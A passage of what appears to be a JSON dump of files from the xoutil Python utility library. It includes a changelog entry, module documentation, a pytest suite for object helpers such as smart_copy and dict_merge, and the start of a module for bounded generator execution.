"is_generated": false, "is_vendor": false, "language": 
"reStructuredText", "length_bytes": 149, "license_type": "permissive", "max_line_length": 75, "num_lines": 4, "path": "/docs/source/history/_changes-1.6.6.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Improved the `xoutil.string.normalize_slug`:func: by providing both valid\n and invalid chars.\n\n- Added the `xoutil.string.normalize_ascii`:func:.\n" }, { "alpha_fraction": 0.6881889700889587, "alphanum_fraction": 0.6976377964019775, "avg_line_length": 29.238094329833984, "blob_id": "943b4b6d4e940a278f5345b4110239fecdaf67b6", "content_id": "3bc1fbb10d1fb9a0150d7f5ae18050fa2a13f3df", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 635, "license_type": "permissive", "max_line_length": 77, "num_lines": 21, "path": "/docs/source/xotl.tools/future/inspect.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.future.inspect`:mod: - Inspect live objects\n=======================================================\n\n.. module:: xotl.tools.future.inspect\n\nThis module extends the standard library's `functools`:mod:. You may use it\nas a drop-in replacement in many cases.\n\nAvoid importing ``*`` from this module since could be different in Python 2.7\nand Python 3.3.\n\nWe added the following features.\n\n.. autofunction:: get_attr_value\n\nWe have backported several Python 3.3 features but maybe not all (some\nprotected structures are not presented in this documentation).\n\n.. autofunction:: getfullargspec\n\n.. 
autofunction:: getattr_static\n" }, { "alpha_fraction": 0.559222936630249, "alphanum_fraction": 0.5774090886116028, "avg_line_length": 23.979351043701172, "blob_id": "0f7810bf32cd4f1939d5c93225d5a8824eeb020d", "content_id": "cc5febdfd4c9ea8d305dda52712a2941dc4f36c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16937, "license_type": "no_license", "max_line_length": 80, "num_lines": 678, "path": "/tests/test_objects.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nimport pytest\nfrom xoutil.objects import smart_copy\n\n\ndef test_smart_copy():\n class new:\n def __init__(self, **kw):\n for k, v in kw.items():\n setattr(self, k, v)\n\n source = new(a=1, b=2, c=4, _d=5)\n target = {}\n smart_copy(source, target, defaults=False)\n assert target == dict(a=1, b=2, c=4)\n\n source = new(a=1, b=2, c=4, _d=5)\n target = {}\n smart_copy(source, target, defaults=None)\n assert target == dict(a=1, b=2, c=4)\n\n target = {}\n smart_copy(source, target, defaults=True)\n assert target[\"_d\"] == 5\n\n\ndef test_smart_copy_with_defaults():\n defaults = {\n \"host\": \"localhost\",\n \"port\": 5432,\n \"user\": \"openerp\",\n \"password\": (KeyError, \"{key}\"),\n }\n kwargs = {\"password\": \"keep-out!\"}\n args = smart_copy(kwargs, {}, defaults=defaults)\n assert args == dict(\n host=\"localhost\", port=5432, user=\"openerp\", password=\"keep-out!\"\n )\n\n # if missing a required key\n with pytest.raises(KeyError):\n args = smart_copy({}, {}, defaults=defaults)\n\n\ndef test_smart_copy_signature():\n with pytest.raises(TypeError):\n smart_copy({}, defaults=False)\n\n\ndef 
test_smart_copy_from_dict_to_dict():\n c = dict(c=1, d=23)\n d = dict(d=1)\n smart_copy(c, d)\n assert d == dict(c=1, d=23)\n\n\ndef test_smart_copy_with_plain_defaults():\n c = dict(a=1, b=2, c=3)\n d = {}\n smart_copy(c, d, defaults=(\"a\", \"x\"))\n assert d == dict(a=1, x=None)\n\n\ndef test_smart_copy_with_callable_default():\n def default(attr, source=None):\n return attr in (\"a\", \"b\")\n\n c = dict(a=1, b=\"2\", c=\"3x\")\n d = {}\n smart_copy(c, d, defaults=default)\n assert d == dict(a=1, b=\"2\")\n\n class inset:\n def __init__(self, items):\n self.items = items\n\n def __call__(self, attr, source=None):\n return attr in self.items\n\n c = dict(a=1, b=\"2\", c=\"3x\")\n d = {}\n smart_copy(c, d, defaults=inset(\"ab\"))\n assert d == dict(a=1, b=\"2\")\n\n\ndef test_fulldir():\n from xoutil.objects import fulldir\n\n assert {\"__getitem__\", \"get\", \"items\", \"keys\"} < fulldir({})\n\n\ndef test_newstyle_metaclass():\n class Field:\n __slots__ = (str(\"name\"), str(\"default\"))\n\n def __init__(self, default):\n self.default = default\n\n def __get__(self, inst, owner):\n if not inst:\n return self\n return self.default\n\n class ModelType(type):\n pass\n\n class Base:\n def __init__(self, **attrs):\n self.__dict__.update(attrs)\n\n class Model(metaclass=ModelType):\n f1 = Field(1009)\n f2 = 0\n\n def __init__(self, **attrs):\n self.__dict__.update(attrs)\n\n class Model2(Base, metaclass=ModelType):\n pass\n\n class SubMeta(ModelType):\n pass\n\n class Submodel(Model, metaclass=SubMeta):\n pass\n\n inst = Model(name=\"Instance\")\n assert inst.f1 == 1009\n assert inst.name == \"Instance\"\n assert isinstance(Model.f1, Field)\n assert type(Model) is ModelType\n assert type(Submodel) is SubMeta\n assert type(Model2) is ModelType\n assert Model2.__base__ is Base\n assert Submodel.__base__ is Model\n assert Model.__base__ is object\n\n\ndef test_new_style_metaclass_registration():\n class BaseMeta(type):\n classes = []\n\n def __new__(cls, name, bases, 
attrs):\n res = super(BaseMeta, cls).__new__(cls, name, bases, attrs)\n cls.classes.append(res) # <-- side effect\n return res\n\n class Base(metaclass=BaseMeta):\n pass\n\n class SubType(BaseMeta):\n pass\n\n class Egg(Base, metaclass=SubType):\n pass\n\n assert Egg.__base__ is Base\n assert len(BaseMeta.classes) == 2\n\n class Spam(Base, metaclass=SubType):\n 'Like \"Egg\" but it will be registered twice in Python 2.x.'\n\n assert len(BaseMeta.classes) == 3 # Properly called once in Python 3\n\n # Nevertheless the bases are ok.\n assert Spam.__bases__ == (Base,)\n\n\ndef test_lazy():\n from xoutil.objects import lazy, setdefaultattr\n\n class new:\n pass\n\n inst = new()\n setter = lambda a: -a\n setdefaultattr(inst, \"c\", lazy(setter, 10))\n assert inst.c == -10\n setdefaultattr(inst, \"c\", lazy(setter, 20))\n assert inst.c == -10\n\n\n# Easly creates a hierarchy of objects\nclass new:\n def __init__(self, **kwargs):\n attrs = {}\n children = {}\n for attr, value in kwargs.items():\n if \".\" in attr:\n name, childattr = attr.split(\".\", 1)\n child = children.setdefault(name, {})\n child[childattr] = value\n else:\n attrs[attr] = value\n self.__dict__.update(attrs)\n assert set(attrs.keys()) & set(children.keys()) == set()\n for child, vals in children.items():\n setattr(self, child, new(**vals))\n\n\ndef test_traversing():\n from xoutil.objects import traverse, get_traverser\n\n obj = new(**{\"a\": 1, \"b.c.d\": {\"x\": 2}, \"b.c.x\": 3})\n assert traverse(obj, \"a\") == 1\n assert traverse(obj, \"b.c.d.x\") == 2\n assert traverse(obj, \"b.c.x\") == 3\n with pytest.raises(AttributeError):\n traverse(obj, \"a.v\")\n with pytest.raises(AttributeError):\n traverse(obj, \"a.b.c.d.y\")\n\n traverser = get_traverser(\"a\", \"b.c.d.x\", \"b.c.d.y\")\n with pytest.raises(AttributeError):\n traverser(obj)\n obj.b.c.d[\"y\"] = None\n assert traverser(obj) == (1, 2, None)\n\n\ndef test_traversing_bug_ignoring_getter():\n import mock\n from xoutil.objects import 
traverse\n\n sentinel = object()\n\n class Me:\n def __getattr__(self, attr):\n return self\n\n return_sentinel = mock.Mock(return_value=sentinel)\n\n me = Me()\n assert traverse(me, \"x.y\", getter=return_sentinel) is sentinel\n assert return_sentinel.called\n\n\ndef test_dict_merge_base_cases():\n from xoutil.objects import dict_merge\n\n base = {\"a\": \"a\", \"d\": {\"attr1\": 2}}\n assert dict_merge() == {}\n assert dict_merge(base) == base\n assert dict_merge(**base) == base\n\n\ndef test_dict_merge_simple_cases():\n from xoutil.objects import dict_merge\n\n first = {\"a\": {\"attr1\": 1}, \"b\": {\"attr1\": 1}, \"c\": 194, \"shared\": 1}\n second = {\"a\": {\"attr2\": 2}, \"b\": {\"attr2\": 2}, \"d\": 195, \"shared\": 2}\n expected = {\n \"a\": {\"attr1\": 1, \"attr2\": 2},\n \"b\": {\"attr1\": 1, \"attr2\": 2},\n \"c\": 194,\n \"d\": 195,\n \"shared\": 2,\n }\n assert dict_merge(first, second) == expected\n assert dict_merge(first, **second) == expected\n assert dict_merge(second, first) == dict(expected, shared=1)\n assert dict_merge(second, **first) == dict(expected, shared=1)\n\n\ndef test_dict_merge_compatible_cases():\n from xoutil.objects import dict_merge\n\n first = {192: [\"attr1\", 1], 193: {\"attr1\", 1}}\n second = {192: (\"attr2\", 2), 193: [\"attr2\", 2]}\n assert dict_merge(first, second) == {\n 192: [\"attr1\", 1, \"attr2\", 2],\n 193: {\"attr1\", 1, \"attr2\", 2},\n }\n result = dict_merge(second, first)\n assert result[192] == (\"attr2\", 2, \"attr1\", 1)\n key_193 = result[193]\n assert key_193[:2] == [\"attr2\", 2]\n # Since order of set's members is not defined we can't test order, we can\n # only know that they'll be in the last two positions.\n assert key_193.index(\"attr1\") in (2, 3)\n assert key_193.index(1) in (2, 3)\n\n\ndef test_dict_merge_errors():\n from xoutil.objects import dict_merge\n\n first = {192: 192}\n second = {192: [192]}\n with pytest.raises(TypeError):\n dict_merge(second, first)\n with pytest.raises(TypeError):\n 
dict_merge(first, second)\n\n\ndef test_get_first_of():\n from xoutil.objects import get_first_of\n\n somedict = {\"foo\": \"bar\", \"spam\": \"eggs\"}\n assert get_first_of(somedict, \"no\", \"foo\", \"spam\") == \"bar\"\n\n somedict = {\"foo\": \"bar\", \"spam\": \"eggs\"}\n assert get_first_of(somedict, \"eggs\") is None\n\n class Someobject:\n pass\n\n inst = Someobject()\n inst.foo = \"bar\"\n inst.eggs = \"spam\"\n assert get_first_of(inst, \"no\", \"eggs\", \"foo\") == \"spam\"\n assert get_first_of(inst, \"invalid\") is None\n\n somedict = {\"foo\": \"bar\", \"spam\": \"eggs\"}\n\n class Someobject:\n pass\n\n inst = Someobject()\n inst.foo = \"bar2\"\n inst.eggs = \"spam\"\n assert get_first_of((somedict, inst), \"eggs\") == \"spam\"\n assert get_first_of((somedict, inst), \"foo\") == \"bar\"\n assert get_first_of((inst, somedict), \"foo\") == \"bar2\"\n assert get_first_of((inst, somedict), \"foobar\") is None\n\n none = object()\n assert get_first_of((inst, somedict), \"foobar\", default=none) is none\n _eggs = get_first_of(somedict, \"foo\", \"spam\", pred=lambda v: len(v) > 3)\n assert _eggs == \"eggs\"\n _none = get_first_of(somedict, \"foo\", \"spam\", pred=lambda v: len(v) > 4)\n assert _none is None\n\n with pytest.raises(TypeError):\n get_first_of(None, anything=1)\n\n\ndef test_smart_getter():\n from xoutil.objects import smart_getter\n\n class new:\n pass\n\n o = new()\n o.attr1 = 1\n o.attr2 = 1\n getter = smart_getter(o)\n assert getter(\"attr1\") == getter(\"attr2\") == 1\n assert getter(\"attr3\") is None\n\n getter = smart_getter(o, strict=True)\n assert getter(\"attr1\") == getter(\"attr2\") == 1\n with pytest.raises(AttributeError):\n assert getter(\"attr3\") is None\n\n d = {\"key1\": 1, \"key2\": 1}\n getter = smart_getter(d)\n assert getter(\"key1\") == getter(\"key2\") == 1\n assert getter(\"key3\") is None\n\n getter = smart_getter(d, strict=True)\n assert getter(\"key1\") == getter(\"key2\") == 1\n with pytest.raises(KeyError):\n 
assert getter(\"key3\") is None\n assert getter(\"key3\", None) is None\n\n\ndef test_smart_setter():\n from xoutil.objects import smart_setter\n\n class new:\n pass\n\n o = new()\n setter = smart_setter(o)\n setter(\"attr1\", 1)\n setter(\"attr2\", 1)\n assert o.attr1 == o.attr2 == 1\n\n d = {\"key1\": 1, \"key2\": 1}\n setter = smart_setter(d)\n setter(\"key1\", 10)\n assert d[\"key1\"] == 10\n\n\ndef test_extract_attrs():\n from xoutil.objects import extract_attrs\n\n d = dict(a=(1,), b=2, c=3, x=4)\n assert extract_attrs(d, \"a\") == (1,)\n assert extract_attrs(d, \"a\", \"b\", \"c\", \"x\") == ((1,), 2, 3, 4)\n\n with pytest.raises(AttributeError):\n assert extract_attrs(d, \"y\")\n assert extract_attrs(d, \"y\", default=None) is None\n\n class new:\n def __init__(self, **kw):\n self.__dict__.update(kw)\n\n d = new(a=(1,), b=2, c=3, x=4)\n assert extract_attrs(d, \"a\") == (1,)\n assert extract_attrs(d, \"a\", \"b\", \"c\", \"x\") == ((1,), 2, 3, 4)\n\n with pytest.raises(AttributeError):\n assert extract_attrs(d, \"y\")\n assert extract_attrs(d, \"y\", default=None) is None\n\n\ndef test_copy_class():\n from xoutil.symbols import Unset\n from xoutil.objects import copy_class\n\n u = str\n\n class MetaFoo(type):\n pass\n\n class Foo(metaclass=MetaFoo):\n a = 1\n b = 2\n c = 3\n d = 4\n\n class Baz(Foo):\n e = 5\n\n index = {k: getattr(Foo, k) for k in \"abcd\"}\n Bar = copy_class(Foo)\n assert Bar.a == Foo.a and Bar.b and Bar.c and Bar.d\n\n Egg = copy_class(Foo, ignores=[\"b\", \"c\"])\n assert getattr(Egg, \"b\", Unset) is Unset\n\n Egg = copy_class(Foo, ignores=[lambda k: index.get(k) and index.get(k) > 2])\n assert Egg.a == Foo.a\n assert getattr(Egg, \"c\", Unset) is Unset\n\n Named = copy_class(Foo, new_name=\"Named\")\n assert Named.__name__ == \"Named\"\n\n Named = copy_class(Foo, new_name=u(\"Named\"))\n assert Named.__name__ == \"Named\"\n\n import fnmatch\n\n pattern = lambda attr: fnmatch.fnmatch(attr, \"a*\")\n Egg = copy_class(Foo, 
ignores=[pattern])\n assert getattr(Egg, \"a\", Unset) is Unset\n\n import re\n\n _pattern = re.compile(\"^a\")\n pattern = lambda attr: _pattern.match(attr)\n Egg = copy_class(Foo, ignores=[pattern])\n assert getattr(Egg, \"a\", Unset) is Unset\n\n\ndef test_validate_attrs():\n from xoutil.objects import validate_attrs\n\n class Person:\n def __init__(self, **kwargs):\n for which in kwargs:\n setattr(self, which, kwargs[which])\n\n source = Person(name=\"Manuel\", age=33, sex=\"male\")\n target = {\"name\": \"Manuel\", \"age\": 4, \"sex\": \"male\"}\n\n assert validate_attrs(\n source, target, force_equals=(\"sex\",), force_differents=(\"age\",)\n )\n\n assert not validate_attrs(source, target, force_equals=(\"age\",))\n\n\[email protected]()\ndef test_memoized_classproperty():\n from xoutil.objects import memoized_property\n from xoutil.objects import classproperty\n\n current = 1\n\n class Foobar:\n @memoized_property\n @classproperty\n def prop(cls):\n return current\n\n @classproperty\n @memoized_property\n def prop2(cls):\n return current\n\n assert Foobar.prop == current\n current += 1\n assert Foobar.prop != current\n\n\ndef test_properties():\n from xoutil.objects import xproperty, classproperty, staticproperty\n\n _x = \"static\"\n\n class Foobar:\n _x = \"class\"\n\n def __init__(self):\n self._x = \"instance\"\n\n @xproperty\n def x(self):\n return self._x\n\n @classproperty\n def cprop(cls):\n return cls._x\n\n @staticproperty\n def sprop():\n return _x\n\n f = Foobar()\n\n assert Foobar.x == \"class\"\n assert f.x == \"instance\"\n\n assert Foobar.cprop == \"class\"\n assert f.cprop == \"class\"\n\n assert Foobar.sprop == \"static\"\n assert f.sprop == \"static\"\n\n\ndef test_multi_getter_failure():\n \"\"\"`multi_getter` is not the same as `traverse`.\n\n When a collection of identifiers is given, it get the first valid value\n (see the documentation).\n\n \"\"\"\n from xoutil.objects import multi_getter\n from xoutil.objects import traverse\n\n 
class new:\n def __init__(self, **k):\n self.__dict__.update(k)\n\n top = new(d=dict(a=1, b=2), a=10, b=20)\n\n assert traverse(top, \"d.a\") == 1\n assert next(multi_getter(top, (\"d\", \"a\"))) == {\"a\": 1, \"b\": 2}\n\n\ndef test_save_attributes():\n from xoutil.future.types import SimpleNamespace as new\n from xoutil.objects import save_attributes\n\n obj = new(a=1, b=2)\n with save_attributes(obj, \"a\"):\n obj.a = 2\n obj.b = 3\n assert obj.a == 2\n\n assert obj.a == 1\n assert obj.b == 3\n\n\ndef test_temp_attributes():\n from xoutil.future.types import SimpleNamespace as new\n from xoutil.objects import temp_attributes\n\n obj = new(a=1, b=2)\n with temp_attributes(obj, dict(a=2)):\n assert obj.a == 2\n assert obj.b == 2\n obj.b = 3\n\n assert obj.a == 1\n assert obj.b == 3\n\n\ndef test_save_raises_errors():\n from xoutil.future.types import SimpleNamespace as new\n from xoutil.objects import save_attributes\n\n getter = lambda o: lambda a: getattr(o, a)\n obj = new(a=1, b=2)\n with pytest.raises(AttributeError):\n with save_attributes(obj, \"c\", getter=getter):\n pass\n\n with save_attributes(obj, \"x\"):\n pass\n\n assert obj.x is None\n\n obj = object()\n with pytest.raises(AttributeError):\n with save_attributes(obj, \"x\"):\n pass\n\n\ndef test_import_object():\n from xoutil.objects import import_object\n\n assert import_object(\"xoutil.objects.import_object\") is import_object\n assert import_object(\"xoutil.objects:import_object\") is import_object\n\n\ndef test_delegator():\n from xoutil.objects import delegator\n\n class Bar:\n x = object()\n\n class Foo(delegator(\"egg\", {\"x1\": \"x\", \"x2\": \"spam\"})):\n def __init__(self):\n self.egg = Bar()\n\n foo = Foo()\n assert foo.x1 is foo.egg.x\n\n with pytest.raises(AttributeError):\n foo.x2\n\n\ndef test_final_subclasses():\n from xoutil.objects import get_final_subclasses\n\n class Base:\n pass\n\n class Subclass(Base):\n pass\n\n class Final(Subclass):\n pass\n\n class SubSub(Subclass):\n 
pass\n\n class Final2(SubSub):\n pass\n\n assert set(get_final_subclasses(Base)) == {Final, Final2}\n assert set(get_final_subclasses(Final, include_this=False)) == set([])\n\n\ndef test_FinalSubclassEnumeration():\n from xoutil.objects import FinalSubclassEnumeration\n\n class Base:\n pass\n\n enum = FinalSubclassEnumeration(Base)\n enum2 = FinalSubclassEnumeration(Base, dynamic=False)\n\n assert not enum.__members__\n assert not enum2.__members__\n\n class Subclass(Base):\n pass\n\n class Final(Subclass):\n pass\n\n assert enum.Final is Final\n assert not enum2.__members__\n\n enum2.invalidate_cache()\n assert enum2.Final is Final\n" }, { "alpha_fraction": 0.6636363863945007, "alphanum_fraction": 0.6753246784210205, "avg_line_length": 35.66666793823242, "blob_id": "09b0dcd800c8501f3177b3f5c5512cf3f2005aa5", "content_id": "fb29fba86e53582c4d0ebd725739cc00bda38d20", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 771, "license_type": "no_license", "max_line_length": 78, "num_lines": 21, "path": "/xotl/tools/future/__init__.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Extend standard modules including \"future\" features in current versions.\n\nVersion 3 introduce several concepts in standard modules. Sometimes these\nfeatures are implemented in the evolution of 2.7.x versions. By using\nsub-modules, these differences can be avoided transparently. For example, you\ncan import `xotl.tools.future.collections.UserDict`:class: in any version,\nthat it's equivalent to Python 3 `collections.UserDict`:class:, but it don't\nexists in Python 2.\n\n.. 
versionadded:: 1.7.2\n\n\"\"\"\n" }, { "alpha_fraction": 0.6783154010772705, "alphanum_fraction": 0.6792114973068237, "avg_line_length": 31.823530197143555, "blob_id": "ef204ea6321879ded4f83f0966081d6e6dd2a2e6", "content_id": "dc4ce7ab41aedb6eecfc042a91b6c3df6b873279", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1117, "license_type": "no_license", "max_line_length": 73, "num_lines": 34, "path": "/xotl/tools/dim/__init__.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Facilities to work with `concrete numbers`_.\n\nThe name `dim`:mod: is a short of dimension. We borrow it from the topic\n\"dimensional analysis\", even though the scope of this module is less\nambitious.\n\nThis module is divided in two major parts:\n\n- `xotl.tools.dim.meta`:mod: which allows to define almost any kind of\n quantity decorated with a unit.\n\n- Other modules ``xotl.tools.dim.*`` which contains applications of the\n definitions in `~xotl.tools.dim.meta`:mod:. In particular,\n `xotl.tools.dim.base`:mod: contains the `base quantities`_ for the\n `International System of Quantities`_.\n\n\n.. _concrete numbers: https://en.wikipedia.org/wiki/Concrete_number\n\n.. _base quantities: https://en.wikipedia.org/wiki/Base_quantity\n\n.. 
_International System of Quantities: \\\n https://en.wikipedia.org/wiki/International_System_of_Quantities\n\n\"\"\"\n" }, { "alpha_fraction": 0.6094034910202026, "alphanum_fraction": 0.6121637225151062, "avg_line_length": 32.34633255004883, "blob_id": "bde46453768d7da0ef0a88dda2baf597ca5be6f2", "content_id": "b780f42dd7a5e8246d9e69dfd526ba329bab9f20", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21376, "license_type": "no_license", "max_line_length": 88, "num_lines": 641, "path": "/xotl/tools/bound.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Helpers for bounded execution of co-routines.\n\nExample::\n\n >>> def fibonacci():\n ... a, b = 1, 1\n ... while True:\n ... yield a\n ... a, b = b, a + b\n\nThis function yields forever. This module allows to get instances of that\nfunction that run until a boundary condition is met. 
For instance, the\n`times`:func: boundary stops after a given numbers of results are generated::\n\n >>> fib8 = times(8)(fibonacci)\n >>> fib8() # the 8th fibonacci number is\n 21\n\nThis is repeatable::\n\n >>> fib8() # the 8th fibonacci number is\n 21\n\n >>> fib8() # the 8th fibonacci number is\n 21\n\nUnless you pass in a generator::\n\n >>> fib8 = times(8)(fibonacci())\n >>> fib8()\n 21\n\n >>> fib8() is None\n True\n\n\"\"\"\n\nfrom types import GeneratorType\nfrom xotl.tools.decorator.meta import decorator\n\n\nclass BoundedType(type):\n \"\"\"A bounded generator/function.\"\"\"\n\n pass\n\n\nclass Bounded(metaclass=BoundedType):\n \"\"\"The bounded function.\n\n This is the result of applying a `boundary definition` to an `unbounded\n function` (or generator).\n\n If `target` is a function this instance can be called several times. If\n it's a generator then it will be closed after either calling\n (``__call__``) this instance, or consuming the generator given by\n `generate`:meth:.\n\n \"\"\"\n\n def __init__(self, target):\n self.target = target\n\n # The following two methods are actually implemented as closures in the\n # apply method of BoundaryCondition. Nevertheless, they are documented\n # here as an API promise.\n def __call__(self, *args, **kwargs):\n \"\"\"Return the last value from the underlying `bounded generator`.\n\n \"\"\"\n raise NotImplementedError()\n\n def generate(self, *args, **kwargs):\n \"\"\"Return the `bounded generator`.\n\n This method exposes the `bounded generator`. This allows you to \"see\"\n all the values yielded by the `unbounded generator` up to the point\n when the boundary condition is met.\n\n \"\"\"\n raise NotImplementedError()\n\n\nclass BoundaryCondition:\n \"\"\"Embodies the boundary protocol.\n\n The `definition` argument must a function that implements a `boundary\n definition`. 
This function may take arguments to initialize the state of\n the boundary condition.\n\n Instances are callables that will return a `Bounded`:class: subclass\n specialized with the application of the `boundary condition` to a given\n unbounded function (`target`). For instance, ``times(6)`` returns a\n class, that when instantiated with a `target` represents the bounded\n function that takes the 6th valued yielded by target.\n\n If the `definition` takes no arguments for initialization you may pass the\n `target` directly. This is means that if `__call__`:func: receives\n arguments they will be used to instantiate the `Bounded`:class: subclass,\n ie. this case allows only a single argument `target`.\n\n If `errors` is not None it should be a tuple of exceptions to catch and\n throw inside the boundary condition definition. Other exceptions, beside\n GeneratorExit and StopIteration, are not handled (so the bubble up). See\n `until_error`:func:.\n\n \"\"\"\n\n def __new__(cls, definition, name=None, errors=None):\n from types import FunctionType\n\n if not isinstance(definition, FunctionType):\n raise TypeError('\"definition\" must be a function')\n if not name:\n from xotl.tools.names import nameof\n\n name = nameof(definition, inner=True, full=True)\n result = super().__new__(cls)\n result.name = name # needs to be set here or it'll be None\n return result\n\n def __init__(self, definition, name=None, errors=None):\n from inspect import getargspec\n\n spec = getargspec(definition)\n self.args = spec[0]\n self.defaults = spec[3]\n self.varargs = spec[1]\n self.varkwargs = spec[2]\n self.definition = definition\n if not errors:\n errors = (Exception,)\n self.errors = errors\n\n def __str__(self):\n return str(\"boundary %s(...)\" % self.name)\n\n def __repr__(self):\n return str(self)\n\n @property\n def receive_args(self):\n return self.args or self.defaults or self.varargs or self.varkwargs\n\n def apply(self, args, kwargs):\n def execute(boundary, unbounded, 
initial):\n \"\"\"Executes the unbounded generator guarded by a boundary condition.\n\n `boundary` is the boundary condition. `unbounded` is the unbounded\n generator. Both must be generators.\n\n `initial` is the tuple of ``(args, kwargs)`` passed when calling\n the unbounded function or None.\n\n This function is used in the (closure) `generate` method of the\n Bounded subclass returned by `apply`. It contains the core\n algorithm that interleaves the boundary condition with the\n unbounded generator.\n\n \"\"\"\n try:\n next(boundary) # Initialize the boundary condition\n stop = boundary.send(initial)\n except StopIteration:\n raise RuntimeError('Invalid boundary definition \"%r\"' % self.definition)\n try:\n while stop is not True:\n try:\n data = next(unbounded)\n yield data\n except (GeneratorExit, StopIteration):\n stop = True\n except self.errors as error:\n stop = boundary.throw(error)\n else:\n try:\n stop = boundary.send(data)\n except StopIteration:\n raise RuntimeError(\n 'Invalid boundary definition \"%r\"' % self.definition\n )\n finally:\n boundary.close()\n unbounded.close()\n\n class bounded(Bounded):\n @classmethod\n def build_pred(boundedcls):\n return self.build_generator(args, kwargs)\n\n def generate(me, *args, **kwargs):\n target = me.target\n if isinstance(target, GeneratorType):\n return execute(me.build_pred(), target, None)\n else:\n generator = target(*args, **kwargs)\n return execute(me.build_pred(), generator, (args, kwargs))\n\n def __call__(me, *args, **kwargs):\n data = None\n for data in me.generate(*args, **kwargs):\n pass\n return data\n\n return bounded # return from apply()\n\n def build_generator(self, args, kwargs):\n if self.receive_args:\n generator = self.definition(*args, **kwargs)\n else:\n generator = self.definition()\n return generator\n\n def __call__(self, *args, **kwargs):\n if self.receive_args:\n return self.apply(args, kwargs)\n elif args or kwargs:\n result = self.apply((), {})(*args, **kwargs)\n if len(args) 
== 1:\n from functools import update_wrapper\n\n update_wrapper(result, args[0])\n return result\n else:\n return self.apply((), {})\n\n\n@decorator\ndef boundary(definition, name=None, base=BoundaryCondition, errors=None):\n \"\"\"Helper to define a boundary condition.\n\n The `definition` must be a function that returns a generator. The\n following rules **must be** followed. Collectively these rules are called\n the `boundary protocol`.\n\n - The `boundary definition` will yield True when and only when the\n boundary condition is met. Only the value True will signal the boundary\n condition.\n\n - The `boundary definition` must yield at least 2 times:\n\n - First it will be called its ``next()`` method to allow for\n initialization of internal state.\n\n - Immediately after, it will be called its ``send()`` passing the tuple\n ``(args, kwargs)`` with the arguments passed to the `unbounded\n function`. At this point the boundary definition may yield True to\n halt the execution. In this case, the `unbounded generator` won't be\n asked for any value.\n\n - The `boundary definition` must yield True before terminating with a\n StopIteration. For instance the following definition is invalid cause\n it ends without yielding True::\n\n @boundary\n def invalid():\n yield\n yield False\n\n - The `boundary definition` must deal with GeneratorExit exceptions\n properly since we call the ``close()`` method of the generator upon\n termination. Termination occurs when the `unbounded generator` stops by\n any means, even when the boundary condition yielded True or the\n generator itself is exhausted or there's an error in the generator.\n\n Both `whenall`:func: and `whenany`:func: call the ``close()`` method of\n all their subordinate boundary conditions.\n\n Most of the time this reduces to *not* catching GeneratorExit\n exceptions.\n\n A RuntimeError may happen if any of these rules is not followed by the\n `definition`. 
Furthermore, this error will occur when invoking the\n `bounded function` and not when applying the boundary to the `unbounded\n generator`.\n\n \"\"\"\n from functools import update_wrapper\n\n result = base(definition, name=name, errors=errors)\n return update_wrapper(result, definition)\n\n\n@boundary\ndef timed(maxtime):\n \"\"\"Becomes True after a given amount of time.\n\n The bounded generator will be allowed to yields values until the `maxtime`\n time frame has elapsed.\n\n Usage::\n\n @timed(timedelta(seconds=60))\n def do_something_in_about_60s():\n while True:\n yield\n\n .. note:: This is a very soft limit.\n\n We can't actually guarrant any enforcement of the time limit. If the\n bounded generator takes too much time or never yields this predicated\n can't do much. This usually helps with batch processing that must not\n exceed (by too much) a given amount of time.\n\n The timer starts just after the ``next()`` function has been called for\n the predicate initialization. So if the `maxtime` given is too short this\n predicated might halt the execution of the bounded function without\n allowing any processing at all.\n\n If `maxtime` is not a timedelta, the timedelta will be computed as\n ``timedelta(seconds=maxtime)``.\n\n \"\"\"\n from datetime import datetime, timedelta\n\n if isinstance(maxtime, timedelta):\n bound = maxtime\n else:\n bound = timedelta(seconds=maxtime)\n start = datetime.now()\n yield False # Deal with next-send calling scheme for boundaries\n while datetime.now() - start < bound:\n yield False\n yield True # Or we're not compliant with the boundary protocol.\n\n\n@boundary\ndef times(n):\n \"\"\"Becomes True after a given after the `nth` item have been produced.\"\"\"\n passed = 0\n yield False\n while passed < n:\n yield False\n passed += 1\n yield True\n\n\n@boundary\ndef accumulated(mass, *attrs, **kwargs):\n \"\"\"Becomes True after accumulating a given \"mass\".\n\n `mass` is the maximum allowed to accumulate. 
